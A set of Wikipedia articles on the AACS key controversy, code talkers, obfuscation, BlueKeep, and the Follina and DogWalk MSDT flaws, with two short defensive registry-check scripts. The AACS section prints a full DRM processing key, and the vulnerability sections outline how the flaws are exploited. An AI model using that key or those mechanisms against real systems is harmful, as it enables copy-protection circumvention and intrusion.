On May 17, one week before any discs with the updated processing key had reached retail, claims were reported of the new keys having been retrieved from a preview disc of The Matrix Trilogy.[34] On May 23, the key 45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2 was posted on Edward Felten's Freedom to Tinker blog[35] and confirmed a week later by arnezami on Doom9 as the new processing key (MKBv3).[36]

As early as April 17, 2007, the AACS LA had issued DMCA violation notices, sent by Charles S. Sims of Proskauer Rose.[37][38] Following this, dozens of notices were sent to various websites hosted in the United States.[39]

On May 1, 2007, in response to a DMCA demand letter, the technology news site Digg began closing accounts and removing posts containing or alluding to the key. The Digg community reacted by creating a flood of posts containing the key, many using creative ways of disguising it,[40][failed verification] such as embedding the number semi-directly or indirectly in songs or images (either representing the digits pictorially or encoding bytes of the key as colors) or on merchandise.[41] At one point, Digg's "entire homepage was covered with links to the HD-DVD code or anti-Digg references."[42] Eventually the Digg administrators reversed their position, with founder Kevin Rose stating: "But now, after seeing hundreds of stories and reading thousands of comments, you've made it clear. You'd rather see Digg go down fighting than bow down to a bigger company.
We hear you, and effective immediately we won't delete stories or comments containing the code and will deal with whatever the consequences might be."[43][44][45]

Lawyers and other representatives of the entertainment industry, including Michael Avery, an attorney for Toshiba Corporation, expressed surprise at Digg's decision, but suggested that a suit aimed at Digg might merely spread the information more widely: "If you try to stick up for what you have a legal right to do, and you're somewhat worse off because of it, that's an interesting concept."

The American Bar Association's eReport published a discussion of the controversy,[47] in which Eric Goldman of Santa Clara University's High Tech Law Institute noted that the illegality of putting the code up is questionable (Section 230 of the Communications Decency Act may protect the provider when the material itself is not copyrighted), although continuing to allow posting of the key may be "risky"; entertainment lawyer Carole Handler noted that even if the material is illegal, laws such as the DMCA may prove ineffective in a practical sense.

In response to the events occurring on Digg and the call to "Spread this number", the key was rapidly posted to thousands of pages, blogs, and wikis across the Internet.[48][49] The reaction was an example of the Streisand effect.[50] Intellectual property lawyer Douglas J. Sorocco noted, "People are getting creative. It shows the futility of trying to stop this. Once the information is out there, cease-and-desist letters are going to infuriate this community more."[47] Outside the Internet and the mass media, the key has appeared in or on T-shirts, poetry, songs and music videos, illustrations and other graphic artworks,[51] tattoos and body art,[52] and comic strips.[53] The Linux kernel also incorporated a copy of the key for 17.5 years, originally added in 2007 by David Woodhouse as part of the red zone logic[54] and subsequently removed as a routine cleanup in 2024.[55]

On Tuesday afternoon, May 1, 2007, a Google search for the key returned 9,410 results,[56] while the same search the next morning returned nearly 300,000 results.[9] On Friday, the BBC reported that a Google search showed almost 700,000 pages had published the key,[15] despite the fact that on April 17 the AACS LA had sent a DMCA notice to Google, demanding that it stop returning any results for searches for the key.[57][58]

Widespread news coverage[42][59][44][60][61] included speculation on the development of user-driven websites,[62] the legal liability of running a user-driven website,[63] the perception of acceptance of DRM,[64] the failure as a business model of "secrecy based businesses ... in every aspect" in the Internet era,[65] and the harm an industry can cause itself with harshly perceived legal action.[66]

In an opposing move, Carter Wood of the National Association of Manufacturers said they had removed the "Digg It" link from their weblog:[67] "Until the Digg community shows as much fervor in attacking intellectual piracy as attacking the companies that are legitimately defending their property, well, we do not want to be promoting the site by using the 'Digg It' feature."

Media coverage initially avoided quoting the key itself. However, several US-based news sources ran stories containing the key, quoting its use on Digg,[68][69][70][71][72][73] though none are known to have received DMCA notices as a result.
Later reports discussed the matter while quoting the key itself.[74] Current TV broadcast the key during a Google Current story on the Digg incident on May 3, 2007, displaying it in full on screen for several seconds and placing the story on the station's website.[75]

On May 1, 2007, Wikipedia locked the page named for the number "to prevent the former secret from being posted again". The page on HD DVD was locked as well, to keep out "The Number".[76] This action was later reversed. No one has been arrested or charged for finding or publishing the original key.[40][unreliable source?]

On May 7, 2007, the AACS LA announced on its website that it had "requested the removal solely of illegal circumvention tools, including encryption keys, from a number of web sites", and that it had "not requested the removal or deletion of any ... discussion or commentary". The statement continued, "AACS LA is encouraged by the cooperation it has received thus far from the numerous web sites that have chosen to address their legal obligations in a responsible manner."[77] BBC News had earlier quoted an AACS executive saying that bloggers had "crossed the line", that AACS was looking at "legal and technical tools" to confront those who published the key, and that the events involving Digg were an "interesting new twist".[15]
https://en.wikipedia.org/wiki/AACS_encryption_key_controversy
A code talker was a person employed by the military during wartime to use a little-known language as a means of secret communication. The term is most often used for United States service members during the World Wars who used their knowledge of Native American languages as a basis to transmit coded messages. In particular, there were approximately 400 to 500 Native Americans in the United States Marine Corps whose primary job was to transmit secret tactical messages. Code talkers transmitted messages over military telephone or radio communications nets using formally or informally developed codes built upon their indigenous languages. The code talkers improved the speed of encryption and decryption of communications in front-line operations during World War II and are credited with some decisive victories. Their code was never broken.

Two code types were used during World War II. Type one codes were formally developed, based on the languages of the Comanche, Hopi, Meskwaki, and Navajo peoples. They used words from their languages for each letter of the English alphabet; messages could be encoded and decoded using a simple substitution cipher in which the ciphertext was the Native-language word. Type two code was informal and directly translated from English into the indigenous language. If there was no corresponding word in the indigenous language for a military term, code talkers used short descriptive phrases. For example, the Navajo did not have a word for submarine, so they translated it as iron fish.[1][2]

The term Code Talker was originally coined by the United States Marine Corps and used to identify individuals who completed the special training required to qualify as code talkers; their service records indicated "642 – Code Talker" as a duty assignment. Today, the term is still strongly associated with the bilingual Navajo speakers trained in the Navajo code during World War II by the US Marine Corps to serve in all six divisions of the Corps and in the Marine Raiders of the Pacific theater. However, the use of Native American communicators pre-dates World War II. Early pioneers of Native American-based communications used by the US military include the Cherokee, Choctaw, and Lakota peoples during World War I.[3] Today the term code talker includes military personnel from all Native American communities who have contributed their language skills in service to the United States.

Other Native American communicators, now referred to as code talkers, were deployed by the United States Army during World War II, including Lakota,[4] Meskwaki, Mohawk,[5][6] Comanche, Tlingit,[7] Hopi,[8] Cree, and Crow soldiers; they served in the Pacific, North African, and European theaters.[9]

Native speakers of the Assiniboine language served as code talkers during World War II to encrypt communications.[10] One of these code talkers was Gilbert Horn Sr., who grew up in the Fort Belknap Indian Reservation of Montana and became a tribal judge and politician.[10]

In November 1952, Euzko Deya magazine[11] reported that sometime in May 1942, upon meeting a large number of US Marines of Basque ancestry in a San Francisco camp, Captain Frank D. Carranza had thought of using the Basque language for codes.[12][13][14] His superiors were concerned about the risk, as there were known settlements of Basque people in the Pacific region, including 35 Basque Jesuits in Hiroshima, led by Pedro Arrupe; a colony of Basque jai alai players in China and the Philippines; and Basque supporters of Falange in Asia.
Consequently, the US Basque code talkers were not deployed in these theaters; instead, they were used initially in tests and in transmitting logistics information for Hawaii and Australia. According to Euzko Deya, on August 1, 1942, Lieutenants Nemesio Aguirre, Fernández Bakaicoa, and Juanana received a Basque-coded message from San Diego for Admiral Chester Nimitz. The message warned Nimitz of Operation Apple, to remove the Japanese from the Solomon Islands. They also translated the start date, August 7, for the attack on Guadalcanal. As the war extended over the Pacific, there was a shortage of Basque speakers, and the US military came to prefer the parallel program based on the use of Navajo speakers.

In 2017, Pedro Oiarzabal and Guillermo Tabernilla published a paper refuting Euzko Deya's article.[15] According to Oiarzabal and Tabernilla, they could not find Carranza, Aguirre, Fernández Bakaicoa, or Juanana in the National Archives and Records Administration or in US Army archives. They did find a small number of US Marines with Basque surnames, but none of them worked in transmissions. They suggest that Carranza's story was an Office of Strategic Services operation to raise sympathy for US intelligence among Basque nationalists.

The US military's first known use of code talkers was during World War I. Cherokee soldiers of the US 30th Infantry Division fluent in the Cherokee language were assigned to transmit messages while under fire during the Second Battle of the Somme. According to the Division Signal Officer, this took place in September 1918, when their unit was under British command.[16][17]

During World War I, company commander Captain Lawrence of the US Army overheard Solomon Louis and Mitchell Bobb having a conversation in Choctaw. Upon further investigation, he found that eight Choctaw men served in the battalion. The Choctaw men in the Army's 36th Infantry Division were trained to use their language in code. They helped the American Expeditionary Forces in several battles of the Meuse-Argonne Offensive. On October 26, 1918, the code talkers were pressed into service, and the "tide of battle turned within 24 hours ... and within 72 hours the Allies were on full attack."[18][19]

German authorities knew about the use of code talkers during World War I, and Germany sent a team of thirty anthropologists to the United States to learn Native American languages before the outbreak of World War II.[20][21] However, the task proved too difficult because of the large array of indigenous languages and dialects. Nonetheless, after learning of the Nazi effort, the US Army opted not to implement a large-scale code talker program in the European theater.

Initially, 17 code talkers were enlisted, but three could not make the trip across the Atlantic before the unit was finally deployed.[22] A total of 14 code talkers using the Comanche language took part in the invasion of Normandy and served in the 4th Infantry Division in Europe.[23] Comanche soldiers of the 4th Signal Company compiled a vocabulary of 250 code terms using words and phrases from their own language.[24] Using a substitution method similar to that of the Navajo, the code talkers used descriptive words from the Comanche language for things that did not have translations. For example, the Comanche language code term for tank was turtle, bomber was pregnant bird, machine gun was sewing machine, and Adolf Hitler was crazy white man.[25][26]

Two Comanche code talkers were assigned to each regiment, and the remainder were assigned to the 4th Infantry Division headquarters.
The Comanche began transmitting messages shortly after landing on Utah Beach on June 6, 1944. Some were wounded, but none were killed.[25] In 1989, the French government awarded the Comanche code talkers the Chevalier of the National Order of Merit. On November 30, 1999, the United States Department of Defense presented Charles Chibitty with the Knowlton Award, in recognition of his outstanding intelligence work.[25][27]

In World War II, the Canadian Armed Forces employed First Nations soldiers who spoke the Cree language as code talkers. Owing to oaths of secrecy and official classification through 1963, the role of the Cree code talkers was less well known than that of their US counterparts, and it went unacknowledged by the Canadian government.[28] A 2016 documentary, Cree Code Talkers, tells the story of one such Métis individual, Charles "Checker" Tomkins. Tomkins died in 2003 but was interviewed shortly before his death by the Smithsonian National Museum of the American Indian. While he identified other Cree code talkers, "Tomkins may have been the last of his comrades to know anything of this secret operation."[29][30]

In 2022, during the Russo-Ukrainian War, the Hungarian language was reported to be used by the Ukrainian army to relay operational military information and orders, so as to avoid being understood by the invading Russian army without the need to encrypt and decipher the messages.[31][32] Ukraine has a sizeable Hungarian population of over 150,000 people, who live mainly in the Kárpátalja (in Hungarian) or Zakarpatska Oblast (in Ukrainian) division of Ukraine, adjacent to Hungary; as Ukrainian nationals, men of enlistment age are also subject to military service, so the Ukrainian army has a Hungarian-speaking capability. Hungarian is one of the most spoken and official languages of this region of present-day Ukraine. The Hungarian language is not an Indo-European language like Slavic Ukrainian or Russian, but a Uralic language; for this reason, it is distinct from and incomprehensible to Russian speakers.[citation needed]

A group of 27 Meskwaki enlisted in the US Army together in January 1941; they comprised 16 percent of Iowa's Meskwaki population. During World War II, the US Army trained eight Meskwaki men to use their native Fox language as code talkers. They were assigned to North Africa. The eight were posthumously awarded the Congressional Gold Medal in 2013; the government gave the awards to representatives of the Meskwaki community.[33][34]

Mohawk language code talkers were used during World War II by the United States Army in the Pacific theater. Levi Oakes, a Mohawk code talker born in Canada, was deployed to protect messages sent by Allied forces using Kanien'kéha, the Mohawk language. Oakes died in May 2019; he was the last of the Mohawk code talkers.[35]

The Muscogee language was used as a type two (informal) code during World War II by enlisted Seminole and Creek people in the US Army.[36] Tony Palmer, Leslie Richard, Edmund Harjo, and Thomas MacIntosh from the Seminole Nation of Oklahoma and Muscogee (Creek) Nation were recognized under the Code Talkers Recognition Act of 2008.[37] The last survivor of these code talkers, Edmond Harjo of the Seminole Nation of Oklahoma, died on March 31, 2014, at the age of 96. His biography was recounted at the Congressional Gold Medal ceremony honoring Harjo and other code talkers at the US Capitol on November 20, 2013.[38][39][40]

Philip Johnston, a civil engineer for the city of Los Angeles,[41] proposed the use of the Navajo language to the United States Marine Corps at the beginning of World War II.
Johnston, a World War I veteran, was raised on theNavajo reservationas the son of missionaries to the Navajo. He was able to converse in what is called "Trader's Navajo," apidgin language. He was among a few non-Navajo who had enough exposure to it to understand some of its nuances. Many Navajo men enlisted shortly after the attack on Pearl Harbor and eagerly contributed to the war effort. Because Navajo has a complexgrammar, it is notmutually intelligiblewith even its closest relatives within theNa-Dene familyto provide meaningful information. It was still an unwritten language at the time, and Johnston believed Navajo could satisfy the military requirement for an undecipherable code. Its complex syntax, phonology, and numerous dialects made it unintelligible to anyone without extensive exposure and training. One estimate indicates that fewer than 30 non-Navajo could understand the language during World War II.[42] In early 1942, Johnston met with the commanding general of the Amphibious Corps, Major GeneralClayton B. Vogel, and his staff. Johnston staged simulated combat conditions, demonstrating that Navajo men could transmit and decode a three-line message in 20 seconds, compared to the 30 minutes it took the machines of the time.[43]The idea of using Navajo speakers as code talkers was accepted; Vogel recommended that the Marines recruit 200 Navajo. However, that recommendation was cut to one platoon to use as a pilot project to develop and test the feasibility of a code. On May 4, 1942, twenty-nine Navajo men were sworn into service atFort Wingate, an old US Army fort converted into aBureau of Indian Affairsboarding school. They were organized as Platoon 382. The first 29 Navajo recruits attended boot camp in May 1942. This first group created the Navajo code atCamp Pendleton.[44] One of the key features of the Navajo Code Talkers is that they employed a coded version of their language. Other Navajos not trained in the Navajo Code could not decipher the messages being sent. Platoon 382 was the Marine Corps's first "all-Indian, all-Navajo" Platoon. The members of this platoon would become known asThe First Twenty-Nine. Most were recruited from near the Fort Wingate, NM, area. The youngest was William Dean Yazzie (aka Dean Wilson), who was only 15 when he was recruited. The oldest wasCarl N. Gorman—who with his son, R. C. Gorman, would become an artist of great acclaim and design the Code Talkers' logo—at age 35. The Navajo code was formally developed and modeled on theJoint Army/Navy Phonetic Alphabetthatuses agreed-upon English words to represent letters. Since it was determined that phonetically spelling out all military terms letter by letter into words while in combat would be too time-consuming, someterms,concepts,tactics, and instruments of modern warfare were given uniquely formal descriptive nomenclatures in Navajo. For example, the word forsharkreferred to a destroyer, whilesilver oak leafindicated the rank of lieutenant colonel.[46] Acodebookwas developed to teach new initiates the many relevant words and concepts. The text was for classroom purposes only and was never to be taken into the field. The code talkers memorized all these variations and practiced their rapid use under stressful conditions during training. 
Navajo speakers who had not been trained in the code work would have no idea what the code talkers' messages meant; they would hear only truncated and disjointed strings of individual, unrelated nouns and verbs.[47][48] The Navajo code talkers were commended for the skill, speed, and accuracy they demonstrated throughout the war. At theBattle of Iwo Jima, Major Howard Connor,5th Marine Divisionsignal officer, had six Navajo code talkers working around the clock during the first two days of the battle. These six sent and received over 800 messages, all without error. Connor later said, "Were it not for the Navajos, the Marines would never have taken Iwo Jima."[44] After incidents where Navajo code talkers were mistaken for ethnic Japanese and were captured by other American soldiers, several were assigned a personal bodyguard whose principal duty was to protect them from their side. According to Bill Toledo, one of the second groups after the original 29, they had a secret secondary duty: if their charge was at risk of being captured, they were to shoot him to protect the code. Fortunately, none was ever called upon to do so.[49][50] To ensure consistent use of code terminologies throughout the Pacific theater, representative code talkers of each of the US Marinedivisionsmet in Hawaii to discuss shortcomings in the code, incorporate new terms into the system, and update their codebooks. These representatives, in turn, trained other code talkers who could not attend the meeting. As the war progressed, additional code words were added and incorporated program-wide. In other instances, informal shortcutscode wordswere devised for a particularcampaignand not disseminated beyond the area of operation. Examples of code words include the Navajo word forbuzzard,jeeshóóʼ, which was used forbomber, while the code word used forsubmarine,béésh łóóʼ, meantiron fishin Navajo.[51]The last of the original 29 Navajo code talkers who developed the code,Chester Nez, died on June 4, 2014.[52] Four of the last nine Navajo code talkers used in the military died in 2019:Alfred K. Newmandied on January 13, 2019, at the age of 94.[53]On May 10, 2019,Fleming Begaye Sr.died at the age of 97.[54]New Mexico State SenatorJohn Pinto, elected in 1977, died in office on May 24, 2019.[55]William Tully Brown died in June 2019 aged 96.[56]Joe Vandever Sr. died at 96 on January 31, 2020.[57]Samuel Sandovaldied on 29 July 2022, at the age of 98.[58][59]John Kinsel Sr.died on 18 October 2024, at the age of 107.[60][61]Only two remaining members are still living as of 2024, Thomas H. Begay and former Navajo chairmanPeter MacDonald.[62] Some code talkers such as Chester Nez and William Dean Yazzie (aka Dean Wilson) continued to serve in the Marine Corps through the Korean War. Rumors of the deployment of the Navajo code into theKorean Warand after have never been proven. The code remained classified until 1968. The Navajo code is the only spoken military code never to have been deciphered.[46] In the1973 Arab–Israeli War, Egypt employedNubian-speakingNubian peopleas code talkers.[63][64][65][66][67] During World War II, American soldiers used their nativeTlingitas a code against Japanese forces. Their actions remained unknown, even after the declassification of code talkers and the publication of the Navajo code talkers. 
The memory of five deceased Tlingit code talkers was honored by the Alaska legislature in March 2019.[68][69] A system employing theWelsh languagewas used by British forces during World War II, but not to any great extent. In 1942, the Royal Air Force developed a plan to use Welsh for secret communications, but it was never implemented.[70]Welsh was used more recently in theYugoslav Warsfor non-vital messages.[71] China usedWenzhounese-speaking people as code talkers during the 1979Sino-Vietnamese War.[72][73] The Navajo code talkers received no recognition until 1968 when their operation was declassified.[74]In 1982, the code talkers were given a Certificate of Recognition by US PresidentRonald Reagan, who also named August 14, 1982 as Navajo Code Talkers Day.[75][76][77][78] On December 21, 2000, PresidentBill Clintonsigned Public Law 106–554, 114 Statute 2763, which awarded theCongressional Gold Medalto the original 29 World War II Navajo code talkers andSilver Medalsto each person who qualified as a Navajo code talker (approximately 300). In July 2001, PresidentGeorge W. Bushhonored the code talkers by presenting the medals to four surviving original code talkers (the fifth living original code talker was unable to attend) at a ceremony held in theCapitol Rotundain Washington, DC. Gold medals were presented to the families of the deceased 24 original code talkers.[79][80] JournalistPatty Talahongvadirected and produced a documentary,The Power of Words: Native Languages as Weapons of War, for theSmithsonian National Museum of the American Indianin 2006, bringing to light the story of Hopi code talkers. In 2011, Arizona established April 23, as an annual recognition day for the Hopi code talkers.[8]TheTexas Medal of Valorwas awarded posthumously to 18 Choctaw code talkers for their World War II service on September 17, 2007, by the Adjutant General of the State of Texas.[81] The Code Talkers Recognition Act of 2008 (Public Law 110–420)[82]was signed into law by PresidentGeorge W. Bushon November 15, 2008. The Act recognized every Native American code talker who served in the United States military during WWI or WWII (except the already-awarded Navajo) with a Congressional Gold Medal. Approximately 50 tribes were recognized.[83]The act was designed to be distinct for each tribe, with silver duplicates awarded to the individual code talkers or their next-of-kin.[84]As of 2013, 33 tribes have been identified and been honored at a ceremony atEmancipation Hallat the US Capitol Visitor Center. One surviving code talker was present, Edmond Harjo.[85] On November 27, 2017, three Navajo code talkers, joined by thePresident of the Navajo Nation,Russell Begaye, appeared with PresidentDonald Trumpin theOval Officein an official White House ceremony. They were there to "pay tribute to the contributions of the young Native Americans recruited by the United States military to create top-secret coded messages used to communicate during World War II battles."[86]The executive director of theNational Congress of American Indians,Jacqueline Pata, noted that Native Americans have "a very high level of participation in the military and veterans' service." A statement by a Navajo Nation Council Delegate and comments by Pata and Begaye, among others, objected to Trump's remarks during the event, including his use "once again ... 
[of] the wordPocahontasin a negative way towards a political adversary Elizabeth Warren who claims 'Native American heritage'."[86][87][88]The National Congress of American Indians objected to Trump's use of the namePocahontas, a historical Native American figure, as a derogatory term.[89] On March 17, 2025,Axiosreported that numerous articles about Native American Code Talkers were removed from some military websites. According to its reporting,Axiosidentified at least 10 articles which had disappeared from the U.S. Army and Department of Defense websites. Pentagon Press Secretary John Ullyot is quoted in response: "As Secretary [Pete] Hegseth has said, DEI is dead at the Defense Department. ... We are pleased by the rapid compliance across the Department with the directive removing DEI content from all platforms."[90][91]
https://en.wikipedia.org/wiki/Code_talker
Obfuscation is the obscuring of the intended meaning of communication by making the message difficult to understand, usually with confusing and ambiguous language. The obfuscation might be either unintentional or intentional (although intent usually is connoted), and is accomplished with circumlocution (talking around the subject), the use of jargon (the technical language of a profession), and the use of an argot (ingroup language) of limited communicative value to outsiders.[1]

In expository writing, unintentional obfuscation usually occurs in draft documents, at the beginning of composition; such obfuscation is illuminated with critical thinking and editorial revision, either by the writer or by an editor. Etymologically, the word obfuscation derives from the Latin obfuscatio, from obfuscāre (to darken); synonyms include the words beclouding and abstrusity.

Doctors are faulted for using jargon to conceal unpleasant facts from a patient; the American author and physician Michael Crichton said that medical writing is a "highly skilled, calculated attempt to confuse the reader". The psychologist B. F. Skinner said that medical notation is a form of multiple audience control, which allows the doctor to communicate to the pharmacist things which the patient might oppose if they could understand medical jargon.[2]

"Eschew obfuscation", also stated as "eschew obfuscation, espouse elucidation", is a humorous fumblerule used by English teachers and professors when lecturing about proper writing techniques. Literally, the phrase means "avoid being unclear" or "avoid being unclear, support being clear", but the use of relatively uncommon words causes confusion in much of the audience (those lacking the vocabulary), making the statement an example of irony, and more precisely a heterological phrase. The phrase has appeared in print at least as early as 1959, when it was used as a section heading in a NASA document.[3]

An earlier similar phrase appears in Mark Twain's Fenimore Cooper's Literary Offenses, where he lists rule fourteen of good writing as "eschew surplusage".

Obfuscation of oral or written communication achieves a degree of secure communication without a need to rely upon technology. This technique is sometimes referred to as "talking around" and is a form of security through obscurity. A notable example of obfuscation of written communication is a message sent by September 11 attacks ringleader Mohamed Atta to other conspirators prior to the attacks occurring:[4]

The semester begins in three more weeks. We've obtained 19 confirmations for studies in the faculty of law, the faculty of urban planning, the faculty of fine arts and the faculty of engineering.

In this obfuscated message, the "faculties" are believed to have been code words for the intended targets, and the "19 confirmations" a reference to the attackers.[5]

Within the illegal drug trade, obfuscation is commonly used in communication to hide the occurrence of drug trafficking. A common spoken example is "420", used as a code word for cannabis, a drug which, despite some recent prominent decriminalization changes, remains illegal in most places. The Drug Enforcement Administration reported in July 2018 a total of 353 different code words used for cannabis.[6]

In white-box cryptography, obfuscation refers to the protection of cryptographic keys from extraction when they are under the control of the adversary, e.g., as part of a DRM scheme.[7]

In network security, obfuscation refers to methods used to obscure an attack payload from inspection by network protection systems.
https://en.wikipedia.org/wiki/Obfuscation
BlueKeep(CVE-2019-0708) is asecurity vulnerabilitythat was discovered inMicrosoft'sRemote Desktop Protocol(RDP) implementation, which allows for the possibility ofremote code execution. First reported in May 2019, it is present in all unpatched Windows NT-based versions of Microsoft Windows fromWindows 2000throughWindows Server 2008 R2andWindows 7. Microsoft issued a security patch (including an out-of-band update for several versions of Windows that have reached their end-of-life, such asWindows XP) on 14 May 2019. On 13 August 2019, related BlueKeep security vulnerabilities, collectively namedDejaBlue, were reported to affectnewerWindows versions, includingWindows 7and all recent versions up toWindows 10of the operating system, as well as the older Windows versions.[3]On 6 September 2019, aMetasploitexploit of thewormableBlueKeep security vulnerability was announced to have been released into the public realm.[4] The BlueKeep security vulnerability was first noted by theUK National Cyber Security Centre[2]and, on 14 May 2019, reported byMicrosoft. The vulnerability was named BlueKeep by computer security expert Kevin Beaumont onTwitter. BlueKeep is officially tracked as: CVE-2019-0708and is a "wormable"remote code executionvulnerability.[5][6] Both the U.S.National Security Agency(which issued its own advisory on the vulnerability on 4 June 2019)[7]and Microsoft stated that this vulnerability could potentially be used byself-propagating worms, with Microsoft (based on a security researcher's estimation that nearly 1 million devices were vulnerable) saying that such a theoretical attack could be of a similar scale toEternalBlue-based attacks such asNotPetyaandWannaCry.[8][9][7] On the same day as the NSA advisory, researchers of theCERT Coordination Centerdisclosed a separateRDP-related security issue inthe Windows 10 May 2019 UpdateandWindows Server 2019, citing a new behaviour where RDPNetwork Level Authentication(NLA) login credentials are cached on the client system, and the user can re-gain access to their RDP connection automatically if their network connection is interrupted. 
Microsoft dismissed this vulnerability as being intended behaviour, and it can be disabled viaGroup Policy.[10] As of 1 June 2019, no activemalwareof the vulnerability seemed to be publicly known; however, undisclosedproof of concept(PoC) codes exploiting the vulnerability may have been available.[8][11][12][13]On 1 July 2019,Sophos, a British security company, reported on a working example of such a PoC, in order to emphasize the urgent need to patch the vulnerability.[14][15][16]On 22 July 2019, more details of an exploit were purportedly revealed by a conference speaker from a Chinese security firm.[17]On 25 July 2019, computer experts reported that a commercial version of the exploit may have been available.[18][19]On 31 July 2019, computer experts reported a significant increase in malicious RDP activity and warned, based on histories of exploits from similar vulnerabilities, that an active exploit of the BlueKeep vulnerability in the wild might be imminent.[20] On 13 August 2019, related BlueKeep security vulnerabilities, collectively namedDejaBlue, were reported to affect newer Windows versions, includingWindows 7and all recent versions of the operating system up toWindows 10, as well as the older Windows versions.[3] On 6 September 2019, an exploit of the wormable BlueKeep security vulnerability was announced to have been released into the public realm.[4]The initial version of this exploit was, however, unreliable, being known to cause "blue screen of death" (BSOD) errors. A fix was later announced, removing the cause of the BSOD error.[21] On 2 November 2019, the first BlueKeep hacking campaign on a mass scale was reported, and included an unsuccessfulcryptojackingmission.[22] On 8 November 2019, Microsoft confirmed a BlueKeep attack, and urged users to immediately patch their Windows systems.[23] The RDP protocol uses "virtual channels", configured before authentication, as a data path between the client and server for providing extensions. RDP 5.1 defines 32 "static" virtual channels, and "dynamic" virtual channels are contained within one of these static channels. If a server binds the virtual channel "MS_T120" (a channel for which there is no legitimate reason for a client to connect to) with a static channel other than 31,heap corruptionoccurs that allows forarbitrary code executionat the system level.[24] Windows XP,Windows Vista,Windows 7,Windows Server 2003,Windows Server 2008, andWindows Server 2008 R2were named by Microsoft as being vulnerable to this attack. Versions newer than 7, such asWindows 8,Windows 10andWindows 11, were not affected. TheCybersecurity and Infrastructure Security Agencystated that it had also successfully achieved code execution via the vulnerability onWindows 2000.[25] Microsoft released patches for the vulnerability on 14 May 2019, forWindows XP,Windows Vista,Windows 7,Windows Server 2003,Windows Server 2008, andWindows Server 2008 R2. This included versions of Windows that have reached theirend-of-life(such as Vista, XP, and Server 2003) and thus are no longer eligible for security updates.[8]The patch forces the aforementioned "MS_T120" channel to always be bound to 31 even if requested otherwise by an RDP server.[24] The NSA recommended additional measures, such as disablingRemote Desktop Servicesand its associatedport(TCP3389) if it is not being used, and requiringNetwork Level Authentication(NLA) for RDP.[26]According to computer security companySophos, two-factor authentication may make the RDP issue less of a vulnerability. 
However, the best protection is to take RDP off the Internet: switch RDP off if not needed and, if needed, make RDP accessible only via a VPN.[27]
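The mitigations above (disabling RDP entirely, or requiring NLA) are both controlled by Windows registry values. The following is a minimal sketch, assuming the commonly documented registry locations and value names (fDenyTSConnections and UserAuthentication); verify them against your Windows version before relying on this check.

```python
import winreg

# Registry locations commonly used by Windows for RDP settings.
TS_KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"

def read_dword(path, name):
    """Return a DWORD value from HKLM, or None if the value is absent."""
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, name)
            return value
    except OSError:
        return None

# fDenyTSConnections == 1 means Remote Desktop is disabled entirely.
rdp_disabled = read_dword(TS_KEY, "fDenyTSConnections") == 1
# UserAuthentication == 1 means Network Level Authentication is required.
nla_required = read_dword(RDP_TCP_KEY, "UserAuthentication") == 1

if rdp_disabled:
    print("RDP is disabled; BlueKeep is not reachable over the network.")
elif nla_required:
    print("RDP is enabled, but NLA is required, which mitigates BlueKeep.")
else:
    print("RDP is enabled without NLA; ensure the May 2019 patch is installed.")
```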
https://en.wikipedia.org/wiki/BlueKeep
The Microsoft Support Diagnostic Tool (MSDT) is a legacy service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes.[1] In April 2022 it was observed to have a security vulnerability that allowed remote code execution, which was being exploited to attack computers in Russia and Belarus, and later against the Tibetan government in exile.[2] Microsoft advised a temporary workaround of disabling the MSDT by editing the Windows registry.[3]

When contacting support, the user is told to run MSDT and given a unique "passkey", which they enter. They are also given an "incident number" to uniquely identify their case. The MSDT can also be run offline, which generates a .CAB file that can be uploaded from a computer with an internet connection.[4]

Follina is the name given to a remote code execution (RCE) vulnerability, a type of arbitrary code execution (ACE) exploit, in the Microsoft Support Diagnostic Tool (MSDT), first widely publicized on May 27, 2022, by a security research group called Nao Sec.[5] This exploit allows a remote attacker to use a Microsoft Office document template to execute code via MSDT. It works by exploiting the ability of Microsoft Office document templates to download additional content from a remote server. If the downloaded content is large enough, it can invoke the ms-msdt: URI protocol handler with attacker-controlled parameters, allowing a payload of PowerShell code to be executed without explicit notification to the user. On May 30 Microsoft issued CVE-2022-30190[6] with guidance that users should disable MSDT.[7] Malicious actors have been observed exploiting the bug to attack computers in Russia and Belarus since April, and it is believed Chinese state actors had been exploiting it to attack the Tibetan government in exile based in India.[8] Microsoft patched this vulnerability in its June 2022 patches.[9]

The DogWalk vulnerability is a remote code execution (RCE) vulnerability in the Microsoft Support Diagnostic Tool (MSDT). It was first reported in January 2020, but Microsoft initially did not consider it to be a security issue. The vulnerability was later exploited in the wild, and Microsoft released a patch for it in August 2022. The flaw is a path traversal vulnerability in the sdiageng.dll library: an attacker tricks a victim into opening a malicious diagcab file (a type of Windows cabinet file used to store support files), which triggers the MSDT tool. Because the file path taken from the archive is not properly validated, MSDT can be made to write an attacker-supplied file outside its intended directory, for example into the Windows Startup folder, where it will be executed the next time the user logs in.[10][11]

Microsoft no longer supports the Windows legacy inbox troubleshooters. MSDT was deprecated in feature updates after May 23, 2023, and Microsoft planned to remove the platform entirely in 2025; Get Help is the replacement tool.[12]
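Microsoft's advised registry workaround for Follina was to remove the ms-msdt: protocol handler key (after exporting a backup, e.g. with "reg export HKCR\ms-msdt msdt_backup.reg"). The sketch below, assuming that standard key location, merely checks whether the handler is still registered; it makes no changes itself.

```python
import winreg

def msdt_handler_registered():
    """True if the ms-msdt: URL protocol handler key exists in HKCR."""
    try:
        with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, "ms-msdt"):
            return True
    except OSError:
        return False

if msdt_handler_registered():
    print("ms-msdt: handler is registered; the Follina workaround is NOT applied.")
else:
    print("ms-msdt: handler not found; the workaround (or a patched build) is in place.")
```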
https://en.wikipedia.org/wiki/Follina_(security_vulnerability)
A cyberattack (or cyber attack) occurs when there is an unauthorized action against computer infrastructure that compromises the confidentiality, integrity, or availability of its content.[1]

The rising dependence on increasingly complex and interconnected computer systems in most domains of life is the main factor behind vulnerability to cyberattacks, since virtually all computer systems have bugs that can be exploited by attackers. Although it is impossible or impractical to create a perfectly secure system, there are many defense mechanisms that can make a system more difficult to attack, making information security a field of rapidly increasing importance in the world today.

